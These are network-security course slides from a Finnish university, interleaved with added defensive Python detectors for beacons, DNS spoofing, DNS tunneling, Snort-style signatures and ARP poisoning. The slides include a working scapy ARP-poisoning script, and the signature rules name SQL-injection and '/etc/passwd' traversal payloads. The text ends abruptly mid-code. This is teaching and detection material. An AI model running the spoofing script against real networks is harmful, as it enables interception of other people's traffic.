
Page 1 (source: users.jyu.fi/~timoh/TIES327/start2016.pdf)

UNIVERSITY OF JYVÄSKYLÄ

TIES327 – Network Security (3-5 ECTS)

Autumn 2016

Prof. Timo Hämäläinen [email protected]

Department of Mathematical Information Technology

IT Faculty

University of Jyväskylä

Page 2

Important note!

If you have completed the "old course" TIES326 in 2012 or 2013, you will not get credits for TIES327, as about 30% of its assignments are the same as those of TIES326 in 2012 and 2013.

Students who completed TIES326 before 2012 can get credits for TIES327.

Page 3

Goals of the course

Students understand what the term "security" covers, in particular from the point of view of networks and services

... get familiar with the different security aspects and understand the necessary terms

... are capable of applying the various tools for auditing and protecting against network attacks

... learn to look for new knowledge in this area

A feeling of safety must not be based on ignorance!

The course focuses on hands-on work with security issues and on learning different network security exercises by doing them yourself

Remember: use of the presented methods is illegal in public networks! They'll put you in a jail cell...

Page 4

Prerequisites

Basic knowledge of networks, TCP/IP protocols and programming

For example the following courses (or equivalent knowledge):

ITKP101 - Tietokone ja tietoverkot työvälineenä (Computer and networks as tools)

ITKP104 - Tietoverkot (Data networks)

ITKP102 - Ohjelmointi 1 (Programming 1)

Page 5

How to complete the course?

Complete the assignments

Groups of 1-3 students

You need at least 50% of the total points and at least 50% of the points of each assignment. Answer all questions presented in the assignments in depth in order to get the course completed.

We really encourage you to install and complete these exercises on your own devices. If that is not possible, send me an email and ask for time in our lab to complete them there. If you are coming to the lab, read the assignment carefully and answer the preliminary questions before coming.

The course can be completed for 3-5 ECTS:

3 ECTS: complete assignments 1-3

4 ECTS: complete assignments 1-4

5 ECTS: complete all 5 assignments

Page 6

About the assignments

1. Virtual Network Configuration and Introduction to Kali Linux

• In this first assignment, you will create and configure a virtual network which will be used for testing different kinds of network attacks.

• To do this you need a PC with at least 8 GB of RAM (more is of course better!).

• We are using Ubuntu 16.04 on the host machine, but it is of course possible to make the same virtual network configuration on Windows or Mac OS by using the corresponding commands.

• https://www.virtualbox.org/

Page 7

1.1 Virtual Network Configuration

Page 8

1.2 Pentesting with Kali http://www.kali.org/

"From the creators of BackTrack comes Kali Linux, the most advanced and versatile penetration testing distribution ever created. BackTrack has grown far beyond its humble roots as a live CD and has now become a full-fledged operating system."

https://www.kali.org/penetration-testing-with-kali-linux/

In this assignment you are going to get familiar with some of the tools available in Kali. It is intended to build your basic skills and get you familiar with Kali capabilities like:

• Port scanning

• Finding security exploits

• SQL injection

• Password brute-forcing

• Denial-of-Service attack

• etc.

Kali tools: http://tools.kali.org/tools-listing

Page 9

2. Attacks from the Outside and Wi-Fi Security Cracking

2.1 Reverse TCP attacks

In this tutorial, we get familiar with one dangerous attack, the reverse TCP connection. A firewall usually blocks incoming connections to open ports but does not block outgoing traffic; therefore a reverse connection is used to bypass firewall and router security restrictions.

For example, a Trojan horse running on a computer behind a firewall that blocks incoming connections can easily open an outbound connection to a remote host on the Internet. Once the connection is established, the remote host can send commands to the Trojan horse. Trojan horses that use a reverse connection usually send SYN (TCP) packets to the attacker's IP address. The attacker listens for these SYN packets and accepts the desired connections.

It will be shown how to establish a reverse TCP connection between a client and an external attacker machine with Kali Linux 2016.2 installed on it.
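The asymmetry the tutorial relies on, that a firewall permits outbound connections it would refuse inbound, is also what a defender monitors: a backdoor that keeps its reverse connection alive reconnects to the same external address at regular intervals. The following is an added example, not part of the course material, that looks for such periodic flows in an egress connection log. The log and all addresses in it are constructed (the external host 203.0.113.5 and the 198.51.100.x / 192.0.2.x servers are documentation-range placeholders), and the thresholds are choices made for the example.

```python
"""Flag periodic outbound connections of the kind a reverse TCP backdoor makes.

Added defensive example; the connection log is constructed, not a capture
from the course lab.  203.0.113.5 (TEST-NET-3) stands in for the attacker.
"""
import statistics
from collections import defaultdict

# Constructed egress connection log: (timestamp_s, src_host, dst_ip, dst_port).
CONNECTIONS = [
    # Ordinary browsing from 192.168.72.128: irregular timing, several destinations.
    (0.0, "192.168.72.128", "198.51.100.20", 443),
    (1.7, "192.168.72.128", "198.51.100.20", 443),
    (9.2, "192.168.72.128", "192.0.2.30", 80),
    (31.5, "192.168.72.128", "198.51.100.20", 443),
    (47.0, "192.168.72.128", "192.0.2.30", 80),
    (48.1, "192.168.72.128", "192.0.2.31", 443),
]
# Beacon from 192.168.72.130: every 5 s (with slight jitter) to one external host.
CONNECTIONS += [(t, "192.168.72.130", "203.0.113.5", 4444)
                for t in (2.0, 7.1, 12.0, 17.2, 22.1, 27.0, 32.1, 37.0)]


def find_beacons(conns, min_count=6, max_cv=0.2):
    """Return {(src, dst, port): (count, mean_interval_s)} for flows whose
    inter-connection gaps are nearly constant, i.e. whose coefficient of
    variation (stdev / mean) is at most max_cv.  Flows with fewer than
    min_count connections are ignored: too few gaps to judge periodicity."""
    by_flow = defaultdict(list)
    for ts, src, dst, port in conns:
        by_flow[(src, dst, port)].append(ts)

    beacons = {}
    for flow, times in by_flow.items():
        if len(times) < min_count:
            continue
        times.sort()
        gaps = [later - earlier for earlier, later in zip(times, times[1:])]
        mean_gap = statistics.mean(gaps)
        if mean_gap <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean_gap
        if cv <= max_cv:
            beacons[flow] = (len(times), round(mean_gap, 2))
    return beacons


if __name__ == "__main__":
    for flow, (count, gap) in find_beacons(CONNECTIONS).items():
        print(f"periodic flow {flow}: {count} connections, ~{gap}s apart")
```

The browsing flows never reach six connections to one destination, so only the 5-second flow to 203.0.113.5 is reported. Jittered beacons still pass because the test is on the spread of the gaps relative to their mean, not on exact equality; a backdoor that randomizes its interval widely would need a longer window or a different feature (for instance bytes exchanged per connection).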

Page 10

2.2 Wi-Fi "evil twin" attack

In this tutorial, the attacker is supposed to have two network interfaces. For example, you can have two wireless interfaces or one wireless and one wired interface. We also assume that you install Kali Linux 2016.2 on the attacker machine. Your Wi-Fi router must support WPA encryption. Interface "eth0" is used to connect the attacker to the Internet, whereas "wlan0" will be used to create the "evil twin" access point.

It is worth noticing that this tutorial and the next one should be done using real devices, not the virtual network you configured earlier.

The attack presented in this tutorial is not the classical "evil twin" attack, in which the client automatically connects to the "evil" access point after being forced to disconnect from the legitimate one.

In our case, the attack is more a phishing attempt combined with a simple DDoS attack against the legitimate access point. This attack might take place in public places, such as big hotels or airports, where several access points have the same name; when a client cannot connect to a legitimate access point, he might try to connect to the "evil" one without paying attention to the fact that it is unencrypted. In this tutorial, the attack is performed using such applications as Aircrack, Mdk3 and Iptables.

Page 11

2.3 WPA encryption cracking by dictionary attack

This tutorial explains how to crack wireless networks encrypted with WPA by using dictionary attacks. For this tutorial, you are supposed to have two laptops with wireless interfaces (or one laptop and one smartphone) and a wireless access point, e.g. a WiFi router. One of the laptops will be used as a client and the other one as the attacker. In this tutorial, we assume that you install Kali Linux on the attacker machine. The WiFi router must support WPA encryption.

Despite the fact that pure brute force is not effective for cracking WPA encryption, attackers are able to crack it with the help of different dictionary attacks. In this tutorial, this type of attack is demonstrated using different Kali applications: Aircrack, Cowpatty, John The Ripper and Hashcat.

Page 12

3. Attacks from the Inside and Man-In-The-Middle Attacks

3.1 ARP poisoning, DNS and DHCP spoofing

ARP poisoning is also known as ARP spoofing, ARP flooding and ARP poison routing. So what basically is ARP poisoning?

It is a technique which allows an attacker to sniff traffic on a LAN, monitor it and even stop it. ARP poisoning is done by sending fake or spoofed ARP messages onto the Ethernet LAN. By doing so the attacker manages to associate its own MAC address with the IP address of another node on the network (typically the default gateway's IP). Traffic meant for the gateway then goes first to the attacker and then to the gateway, thus allowing the attacker to sniff traffic on the network.

Page 13

3.1 DNS and DHCP spoofing

• The Domain Name System translates names that humans can understand into IP addresses. First, the client sends a DNS query and the DNS server responds with a DNS response. The DNS query and response carry an identical ID number and question. Then the client updates its DNS cache entries with the domain name and IP address. Assume that the attacker wants to change the client's DNS cache so that traffic from the client to the domain web.seclab.jyu.fi is redirected to the attacker's server 192.168.1.102.

• For this purpose the attacker sniffs DNS queries from the client and waits for a DNS query with the relevant question, then spoofs a DNS response, e.g. with the attacker's IP. The client updates its DNS cache and therefore all traffic goes to the attacker. The attacker repeatedly spoofs DNS responses to keep the poisoned cache entry valid. However, the DNS query eventually arrives at the DNS server and the server responds with a legitimate DNS response. When the client gets the legitimate response, it will update its cache. For this reason, ARP poisoning of the client should be done before DNS spoofing. In this section, we show how to spoof the DNS server.

• DHCP (Dynamic Host Configuration Protocol) is used to configure the network settings of hosts on IP networks. DHCP allows hosts to be dynamically configured with an IP address, subnet mask, gateway address and DNS server address. It works as follows: first, the client sends (broadcasts) a DHCP discover containing a transaction ID. The DHCP server responds with a DHCP offer which contains the same transaction ID. The client then sends a DHCP request and the DHCP server responds with a DHCP ack. When applying a DHCP spoofing attack, the attacker waits for a DHCP discover from the client. After getting this request the attacker spoofs a DHCP offer assigning a malicious gateway and/or DNS server. After that the client responds with a DHCP request and the attacker spoofs a DHCP ack as well. Finally, the client updates its DNS server and gateway addresses. However, when the DHCP discover arrives at the DHCP server, this server responds to the client with a legitimate DHCP offer. If the client gets the legitimate offer first, DHCP spoofing will not work. For this reason, the attacker DoSes the DHCP server during the attack so that the DHCP server cannot respond to clients.
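Both spoofing attacks above leave the same trace on the wire: the victim receives two answers to one transaction, the forged one and the legitimate one, and they disagree. The following added example (not part of the course material) applies that observation to DNS. It parses DNS response messages and alerts when two responses carrying the same transaction ID and question name differ in their A records. The messages are constructed; 192.168.1.102 is the attacker address used in the text, while 192.168.1.10 as the legitimate address of web.seclab.jyu.fi is an assumption. The same check carries over to DHCP by keying on the transaction ID and comparing the offered gateway and DNS server addresses instead.

```python
"""Spot DNS spoofing: two responses to one query ID with different A records.

Added defensive example, not part of the course material.  Messages are
constructed; 192.168.1.10 as the real web server address is assumed.
"""
import struct


def encode_name(name):
    """'web.seclab.jyu.fi' -> b'\\x03web\\x05seclab\\x03jyu\\x02fi\\x00'."""
    return b"".join(bytes([len(l)]) + l.encode() for l in name.rstrip(".").split(".")) + b"\x00"


def build_response(txid, qname, ips, ttl=300):
    """Construct a DNS response (QR=1, RD and RA set) with one A record per ip."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, len(ips), 0, 0)
    question = encode_name(qname) + struct.pack("!HH", 1, 1)   # QTYPE A, QCLASS IN
    answers = b""
    for ip in ips:
        # 0xC00C is a compression pointer to the question name at offset 12.
        rdata = bytes(int(o) for o in ip.split("."))
        answers += b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, len(rdata)) + rdata
    return header + question + answers


def read_name(msg, off):
    """Decode a possibly compressed name; return (name, offset after it)."""
    labels, end = [], None
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                 # compression pointer
            if end is None:
                end = off + 2                     # the pointer itself is 2 bytes
            off = struct.unpack_from("!H", msg, off)[0] & 0x3FFF
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels).lower(), (end if end is not None else off)


def parse_response(msg):
    """Return (txid, qname, frozenset of A-record IPs); None if not a response."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack_from("!HHHHHH", msg, 0)
    if not flags & 0x8000 or qdcount != 1:
        return None
    qname, off = read_name(msg, 12)
    off += 4                                      # skip QTYPE and QCLASS
    ips = set()
    for _ in range(ancount):
        _, off = read_name(msg, off)
        rtype, _, _, rdlen = struct.unpack_from("!HHIH", msg, off)
        off += 10
        if rtype == 1 and rdlen == 4:
            ips.add(".".join(str(b) for b in msg[off:off + 4]))
        off += rdlen
    return txid, qname, frozenset(ips)


class DnsSpoofDetector:
    """Remembers the answer sets seen per (transaction ID, name); alerts on conflict."""

    def __init__(self):
        self.seen = {}
        self.alerts = []

    def observe(self, msg):
        parsed = parse_response(msg)
        if parsed is None:
            return None
        txid, qname, ips = parsed
        earlier = self.seen.setdefault((txid, qname), set())
        alert = None
        if earlier and ips not in earlier:
            known = sorted(ip for s in earlier for ip in s)
            alert = f"conflicting answers for {qname} id={txid:#06x}: {known} vs {sorted(ips)}"
            self.alerts.append(alert)
        earlier.add(ips)
        return alert


def demo():
    """Replay a forged answer racing the legitimate one, plus an unrelated query."""
    d = DnsSpoofDetector()
    spoofed = build_response(0x1A2B, "web.seclab.jyu.fi", ["192.168.1.102"])
    legit = build_response(0x1A2B, "web.seclab.jyu.fi", ["192.168.1.10"])
    other = build_response(0x1A2C, "www.jyu.fi", ["192.168.1.10"])
    for m in (spoofed, legit, other):
        d.observe(m)
    return d.alerts
```

Note that the detector alerts whichever answer arrives first; it cannot tell which one is genuine, only that the client was given two. Correlating with the resolver the query was sent to (the forged answer comes from the attacker's MAC, which the ARP check of section 3.1 also sees) is what turns the conflict into attribution.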

Page 14

3.2 HTTP content modification and attack against the bank user

Once an attacker is located in the middle between his victim and other network nodes, he can easily change HTTP requests and responses which go through him. In this section, the attacker changes web pages which the victim requested from a web site to make the victim feel nervous. For this attack, the attacker first spoofs the ARP cache of the victim in order to be "in the middle". Then, when the victim requests a web page, he modifies the content (pictures etc.) contained on the page and sends the result to the victim.

Page 15

3.3 DNS tunneling attack

With DNS tunneling, another protocol can be tunneled through DNS. For tunneling to work, a client-server model is used. The client is typically behind the organization's security controls and the server is located somewhere on the Internet. The DNS communications between the client and server occur over the organization's own DNS infrastructure and any other public DNS servers. Since this is a client-server model, any type of traffic can be sent over the tunnel. Some tunnel applications even provide encryption.

In this tutorial, we consider the following scenario. The malicious actor manages to compromise a host in our LAN by social engineering and installs the DNS tunnel client software. The DNS tunnel client is configured to use the LAN's internal DNS server (192.168.1.2). The internal DNS server forwards non-cached requests to an upstream/public DNS server (192.168.1.1). Our external attacker installs and configures the DNS tunnel server on his machine. We next assume that the external attacker has a registered domain name and, therefore, all DNS requests for that domain are forwarded to the DNS tunnel server. The malicious actor is then able to send data back and forth between the client and server.
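Because every tunnelled byte has to fit into a query name going out and a resource record coming back, tunnel traffic differs from ordinary resolution in ways visible in the resolver's query log alone: very long, high-entropy subdomain labels, record types chosen for payload capacity, and a stream of never-repeating names under a single domain. The following added example (not part of the course material) scores each query on those features and then aggregates per zone, where the signal really lives. The query log is constructed and tunnel-example.test is a placeholder for the attacker's registered domain; the two-label zone split and the thresholds are simplifications chosen for the example.

```python
"""Heuristic DNS-tunnel detection over a resolver query log.

Added defensive example, not part of the course material.  The log is
constructed; tunnel-example.test stands in for the attacker's domain.
"""
import math
from collections import Counter, defaultdict

# Record types that return more bytes to the client than an A record does.
PAYLOAD_TYPES = {"TXT", "NULL", "CNAME", "MX", "SRV"}


def shannon_entropy(s):
    """Bits per symbol of the character distribution of s (0.0 for empty)."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def split_zone(qname, zone_labels=2):
    """'a.b.example.test' -> ('example.test', 'a.b').  Taking the last two labels
    as the zone is a simplification; a deployment would use the public suffix list."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-zone_labels:]), ".".join(labels[:-zone_labels])


def score_query(qname, qtype):
    """Return the list of reasons a single query looks like tunnel traffic."""
    _, sub = split_zone(qname)
    compact = sub.replace(".", "")          # tunnels split payload over several labels
    reasons = []
    if len(compact) > 30:
        reasons.append("long subdomain")
    if shannon_entropy(compact) > 4.0:      # hostnames rarely exceed ~3.5 bits/char
        reasons.append("high-entropy labels")
    if qtype in PAYLOAD_TYPES:
        reasons.append(f"{qtype} query")
    return reasons


def analyze(queries, min_suspicious=3):
    """queries: iterable of (qname, qtype).
    Returns {zone: (suspicious_queries, unique_subdomains, flagged)}; a zone is
    flagged once it has accumulated min_suspicious queries with two or more reasons.
    A single odd query (one reason) is tolerated, which keeps _dmarc TXT lookups out."""
    stats = defaultdict(lambda: [0, set()])
    for qname, qtype in queries:
        zone, sub = split_zone(qname)
        stats[zone][1].add(sub)
        if len(score_query(qname, qtype)) >= 2:
            stats[zone][0] += 1
    return {zone: (susp, len(subs), susp >= min_suspicious)
            for zone, (susp, subs) in stats.items()}


QUERY_LOG = [  # constructed: ordinary lookups followed by tunnel traffic
    ("www.jyu.fi", "A"), ("mail.jyu.fi", "MX"), ("_dmarc.jyu.fi", "TXT"),
    ("www.example.com", "A"), ("cdn.example.org", "A"),
    ("ae7k2pq9zx4mrt8bc3ydf6gh5vn0jwl1su.tunnel-example.test", "TXT"),
    ("q0w9e8r7t6y5u4i3o2p1a2s3d4f5g6h7j8k9.tunnel-example.test", "NULL"),
    ("zm1xn2cv3bl4kj5hg6fd7sa8po9iu0yt1re2.tunnel-example.test", "TXT"),
    ("lk3jh4gf5ds6ap7oi8uy9tr0ew1qz2xc3vb4.tunnel-example.test", "TXT"),
]

if __name__ == "__main__":
    for zone, (susp, uniq, flagged) in analyze(QUERY_LOG).items():
        print(f"{zone}: {susp} suspicious, {uniq} unique names, flagged={flagged}")
```

In the scenario above the place to run this is the internal DNS server (192.168.1.2), which sees every tunnel query before forwarding it upstream; the per-zone unique-name count is also the figure to watch over longer windows, since a tunnel cannot reuse names without hitting the cache.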

Page 16

4. Public-Key Cryptography

4.1 Configuring a VPN connection with the help of OpenVPN

This tutorial explains how to configure a simple OpenVPN server and client, set up your own Certificate Authority (CA), generate keys and sign certificates. In addition, it shortly describes dual-factor authentication based on username and password, which are used by the server for authenticating a connecting client.

OpenVPN is a full-featured SSL VPN which implements secure network extension using the industry standard SSL/TLS protocol, supports flexible client authentication methods based on certificates, smart cards, and/or username/password credentials, and allows user- or group-specific access control policies using firewall rules applied to the VPN virtual interface.

Page 17

4.2 Public-key cryptography with GPG

This tutorial explains how to configure a Public Key Infrastructure (PKI), encrypt files and sign emails by using GNU Privacy Guard (GPG).

• Public-key cryptography allows you to communicate with someone securely without exchanging a secret password first. With public-key encryption, instead of sharing a password, each party generates a "keypair" consisting of a "public" key and a "secret/private" key.

• Each party can then publish their "public" key to the world or send it directly to the other party, while keeping their secret key private and safe. If you have a person's public key, you can do a few things with it:

  • Encrypt a message that only that person can decrypt (they need their secret key to decrypt it).

  • Validate that the person signed a message with their secret key. This also lets you verify strongly that the message was not corrupted or modified in transmission.

• With your secret key, you can do the following things:

  • Decrypt messages encrypted with your public key.

  • Sign messages that others can verify came from you (they need your public key to verify the signature).

• This assignment explains how to configure and use a Public Key Infrastructure (PKI), encrypt files and sign emails by using GNU Privacy Guard (GPG).

• The GNU Privacy Guard is the GNU project's complete and free implementation of the OpenPGP standard as defined by RFC4880. GPG allows you to encrypt and sign your data and communication, and features a versatile key management system as well as access modules for all kinds of public key directories.

Page 18

5. Signature-Based and Anomaly-Based Intrusion Detection

5.1 Signature-based intrusion detection

Nowadays, due to the exponentially growing number of network attacks, intrusion detection has become an important area of research. In this tutorial, we get familiar with the signature-based approach to intrusion detection. First, we analyze a small pcap file which contains network traffic sent to a web service during two hours. Most of the traffic stored in this file is legitimate, but there is also intrusive traffic that we try to find by applying a signature-based detection approach that relies on the analysis of the payload of network packets. After that, we get familiar with Snort, which is a free and open source network intrusion detection and prevention system.
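To make the signature-based approach concrete before turning to Snort, the following added example (not part of the course material, nor Snort's own code) parses a small subset of Snort's rule syntax (the rule header plus the msg, content, nocase and sid options) and runs the rules over constructed HTTP request records standing in for the packets of the assignment's pcap file. Addresses, ports and payloads are all constructed.

```python
"""Minimal signature-based payload inspection in the style of a Snort rule.

Added example, not from the course material or from Snort.  Only a subset of
Snort's rule language is supported, and the packets are constructed records.
"""
import re

# header:  action proto src sport -> dst dport (options)
RULE_RE = re.compile(
    r'^(?P<action>alert)\s+(?P<proto>\w+)\s+(?P<src>\S+)\s+(?P<sport>\S+)\s*->\s*'
    r'(?P<dst>\S+)\s+(?P<dport>\S+)\s*\((?P<opts>.*)\)\s*$')
# options: key:"value"; or a bare flag such as nocase;
OPT_RE = re.compile(r'(\w+)(?::\s*"?([^";]*)"?)?;')


def parse_rule(text):
    """Parse one rule line into a dict; raises ValueError on malformed input."""
    m = RULE_RE.match(text.strip())
    if not m:
        raise ValueError(f"unparsable rule: {text!r}")
    rule = m.groupdict()
    rule["contents"] = []
    rule["nocase"] = False
    for key, val in OPT_RE.findall(rule.pop("opts")):
        if key == "content":
            rule["contents"].append(val)
        elif key == "nocase":
            rule["nocase"] = True
        elif key in ("msg", "sid"):
            rule[key] = val
    return rule


def _port_matches(spec, port):
    return spec == "any" or int(spec) == port


def _addr_matches(spec, addr):
    return spec == "any" or spec == addr


def rule_matches(rule, pkt):
    """pkt: dict with proto, src, sport, dst, dport and payload (bytes)."""
    if rule["proto"] != pkt["proto"]:
        return False
    if not (_addr_matches(rule["src"], pkt["src"]) and _port_matches(rule["sport"], pkt["sport"])
            and _addr_matches(rule["dst"], pkt["dst"]) and _port_matches(rule["dport"], pkt["dport"])):
        return False
    payload = pkt["payload"].lower() if rule["nocase"] else pkt["payload"]
    # Several content: options in one rule are ANDed, as in Snort.
    for pattern in rule["contents"]:
        needle = pattern.encode().lower() if rule["nocase"] else pattern.encode()
        if needle not in payload:
            return False
    return True


def scan(rules, packets):
    """Return [(sid, msg, packet_index)] for every rule that fires on a packet."""
    return [(r.get("sid"), r.get("msg"), i)
            for i, pkt in enumerate(packets) for r in rules if rule_matches(r, pkt)]


RULES = [parse_rule(line) for line in (
    'alert tcp any any -> any 80 (msg:"SQLi tautology in request"; content:"\' OR 1=1"; nocase; sid:1000001;)',
    'alert tcp any any -> any 80 (msg:"directory traversal"; content:"../"; content:"/etc/passwd"; sid:1000002;)',
)]

PACKETS = [  # constructed HTTP requests to the web service
    dict(proto="tcp", src="192.168.1.50", sport=51000, dst="192.168.1.10", dport=80,
         payload=b"GET /index.html HTTP/1.1\r\nHost: web\r\n\r\n"),
    dict(proto="tcp", src="192.168.1.51", sport=51001, dst="192.168.1.10", dport=80,
         payload=b"GET /login?user=admin' or 1=1-- HTTP/1.1\r\nHost: web\r\n\r\n"),
    dict(proto="tcp", src="192.168.1.52", sport=51002, dst="192.168.1.10", dport=80,
         payload=b"GET /../../etc/passwd HTTP/1.1\r\nHost: web\r\n\r\n"),
    dict(proto="tcp", src="192.168.1.53", sport=51003, dst="192.168.1.10", dport=22,
         payload=b"' OR 1=1"),   # same bytes on another port: the header part of the rule rejects it
]

if __name__ == "__main__":
    for sid, msg, idx in scan(RULES, PACKETS):
        print(f"[{sid}] {msg} in packet {idx}")
```

The second request fires only because of nocase; the fourth carries the same bytes but misses the port in the rule header, which is the point of pairing a header with a content match. What the example leaves out, and Snort handles, is reassembling the TCP stream and decoding URL encoding before matching; a payload split across two segments or written as %27%20OR%201%3D1 slips past a byte-for-byte search like this one.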

Page 19

5.1 Payload-based and header-based intrusion detection

The recent rise in the amount of traffic and the increase in line speed put a heavy computational load and resource consumption on such traditional payload-based IDSs. Compared to payload-based intrusion detection, the analysis of information in packet headers handles a considerably lower amount of data. However, since header measurements provide only an aggregated view of the data transferred over the network, they cannot reach the accuracy of the payload-based approach. Thus, a header-based IDS is not supposed to completely substitute a payload-based system, but can be used along with it to allow early detection in environments in which payload-based inspection is not scalable.

In this section, we analyze information contained in packet headers and apply an anomaly-based detection approach. Such an approach searches for a sample that deviates significantly from the expected behavior and classifies such a sample as an anomaly. In this tutorial, we calculate the sample entropy of different parameters extracted from packet headers to find network anomalies.
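The following added example (not part of the course material) carries out the header-based approach on constructed flow records: eight one-minute windows of ordinary web and DNS traffic from ten clients, then one window in which a single host probes sixty ports. For each window it computes the sample entropy of the source-address and destination-port distributions and flags a window whose entropy departs from the baseline formed by the earlier windows. The warm-up length, the three-standard-deviation rule and the 0.5-bit floor are choices made for the example.

```python
"""Header-based anomaly detection with sample entropy per time window.

Added example, not from the course material.  Flow records are constructed:
(timestamp_s, src_ip, dst_ip, dst_port).
"""
import math
import statistics
from collections import Counter, defaultdict


def sample_entropy(values):
    """Shannon entropy (bits) of the empirical distribution of values."""
    n = len(values)
    return -sum(c / n * math.log2(c / n) for c in Counter(values).values()) if n else 0.0


def window_features(records, window_s=60):
    """Group records into windows and compute per-window entropies.
    Returns {window_index: {"src": H(src_ip), "dport": H(dst_port)}}."""
    windows = defaultdict(list)
    for rec in records:
        windows[int(rec[0] // window_s)].append(rec)
    return {w: {"src": sample_entropy([r[1] for r in recs]),
                "dport": sample_entropy([r[3] for r in recs])}
            for w, recs in sorted(windows.items())}


def detect(features, warmup=4, k=3.0, floor=0.5):
    """Flag (window, field, value, baseline_mean) whenever a field's entropy
    deviates from the mean of all earlier windows by more than
    max(k * stdev, floor) bits.  The floor stops a near-constant baseline
    (stdev close to 0) from turning every small fluctuation into an alert;
    the warm-up avoids judging before a baseline exists."""
    alerts = []
    history = defaultdict(list)
    for w, feats in features.items():
        for field, h in feats.items():
            past = history[field]
            if len(past) >= warmup:
                mean, spread = statistics.mean(past), statistics.pstdev(past)
                if abs(h - mean) > max(k * spread, floor):
                    alerts.append((w, field, round(h, 2), round(mean, 2)))
            past.append(h)
    return alerts


def constructed_records():
    """Eight quiet minutes, then a one-host port probe in minute 8."""
    recs = []
    clients = [f"192.168.1.{i}" for i in range(20, 30)]
    for minute in range(8):                      # baseline: web (80/443) and DNS (53)
        for i, c in enumerate(clients):
            base = minute * 60 + i * 5
            recs += [(base, c, "192.168.1.10", 80),
                     (base + 1, c, "192.168.1.10", 443),
                     (base + 2, c, "192.168.1.2", 53)]
    scan_start = 8 * 60
    for p in range(60):                          # anomaly: one source, 60 distinct ports
        recs.append((scan_start + p * 0.5, "192.168.1.102", "192.168.1.10", 1 + p))
    return recs


if __name__ == "__main__":
    for w, field, h, mean in detect(window_features(constructed_records())):
        print(f"window {w}: H({field}) = {h} bits, baseline {mean}")
```

The probe window shows up twice, from opposite directions: source-address entropy collapses to zero (one talker) while destination-port entropy jumps from log2(3) to log2(60). A volumetric flood from many spoofed sources would move the same two numbers the other way, which is why both are tracked rather than one.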

Page 21

An example: ARPpoisoning.py

from scapy.all import *
from time import sleep
import threading
import os, sys


class SpoofThread(threading.Thread):
    """Sends a forged ARP packet every 5 seconds that claims the gateway's IP."""

    def __init__(self, victim, gateway):
        threading.Thread.__init__(self)
        self.packet = ARP()             # op defaults to who-has (ARP request)
        self.packet.psrc = gateway      # IP address we claim to own
        self.packet.pdst = victim       # host whose ARP cache is poisoned

    def run(self):
        counter = 0
        print("spoofing " + str(self.packet.pdst) + " every 5 seconds...")
        try:
            while True:
                send(self.packet, verbose=0)
                counter += 1
                print('poison #' + str(counter))
                sleep(5)
        except Exception as e:
            print(type(e))
            print(e.args)
            print(e)


if __name__ == '__main__':
    if len(sys.argv) != 3:
        sys.exit('Usage: %s <victim(s) IP(s)> <spoofed source IP>\n'
                 'example: python ArpSpoofing.py 192.168.72.128 192.168.72.2'
                 % os.path.basename(__file__))
    targets_dest_ips = [sys.argv[1]]
    spoofed_src_ip = sys.argv[2]        # a plain string, not a one-element list
    for ip in targets_dest_ips:
        SpoofThread(ip, spoofed_src_ip).start()
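The script above works because hosts accept the sender fields of any ARP packet without checking who currently owns the address. The following added example (not part of the course material) is the defender's counterpart to section 3.1 and to ARPpoisoning.py: it parses raw Ethernet/ARP frames, learns which MAC claims each IP, and alerts when an IP is claimed by a different MAC. It watches requests as well as replies, since the script above sends requests (scapy's ARP() default op). The frames and MAC addresses are constructed; 192.168.72.2 and 192.168.72.128 are the addresses from the script's usage line. In practice the table is seeded from DHCP leases or the switch's MAC table and fed from a packet capture.

```python
"""Detect ARP cache poisoning by tracking which MAC claims each IP address.

Added defensive example, not part of the course material; frames are
constructed test data.  Both ARP requests and replies are inspected, because
the sender fields of either will update a neighbour's cache.
"""
import struct

ETH = struct.Struct("!6s6sH")             # dst MAC, src MAC, EtherType
ARP = struct.Struct("!HHBBH6s4s6s4s")     # htype, ptype, hlen, plen, op, sha, spa, tha, tpa
ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def _mac(b):
    return ":".join(f"{x:02x}" for x in b)


def _ip(b):
    return ".".join(str(x) for x in b)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip):
    """Construct an Ethernet/ARP frame (test-data helper)."""
    sha = bytes.fromhex(sender_mac.replace(":", ""))
    tha = bytes.fromhex(target_mac.replace(":", ""))
    spa = bytes(int(o) for o in sender_ip.split("."))
    tpa = bytes(int(o) for o in target_ip.split("."))
    return ETH.pack(tha, sha, ETHERTYPE_ARP) + ARP.pack(1, 0x0800, 6, 4, op, sha, spa, tha, tpa)


def parse_arp(frame):
    """Return (op, sender_mac, sender_ip), or None for non-ARP or truncated frames."""
    if len(frame) < ETH.size + ARP.size:
        return None
    if ETH.unpack_from(frame)[2] != ETHERTYPE_ARP:
        return None
    _, _, _, _, op, sha, spa, _, _ = ARP.unpack_from(frame, ETH.size)
    return op, _mac(sha), _ip(spa)


class ArpWatcher:
    """Learns IP -> MAC bindings and alerts when an IP is claimed by another MAC."""

    def __init__(self, trusted=None):
        # Operator-seeded static bindings (the gateway at least) are never overwritten.
        self.bindings = dict(trusted or {})
        self.alerts = []

    def observe(self, frame):
        parsed = parse_arp(frame)
        if parsed is None:
            return None
        _, mac, ip = parsed
        known = self.bindings.get(ip)
        if known is None:
            self.bindings[ip] = mac         # first sighting: learn it
            return None
        if known != mac:
            alert = f"{ip} claimed by {mac}, expected {known}"
            self.alerts.append(alert)
            return alert
        return None


def demo():
    """Replay constructed frames: real gateway, victim's lookup, then a poisoner."""
    gw_mac, gw_ip = "00:50:56:e1:00:01", "192.168.72.2"
    victim_mac, victim_ip = "00:0c:29:11:22:33", "192.168.72.128"
    rogue_mac = "00:0c:29:aa:bb:cc"
    watcher = ArpWatcher(trusted={gw_ip: gw_mac})
    frames = [
        build_arp(ARP_REPLY, gw_mac, gw_ip, victim_mac, victim_ip),             # genuine reply
        build_arp(ARP_REQUEST, victim_mac, victim_ip, "00:00:00:00:00:00", gw_ip),  # victim asks for gateway
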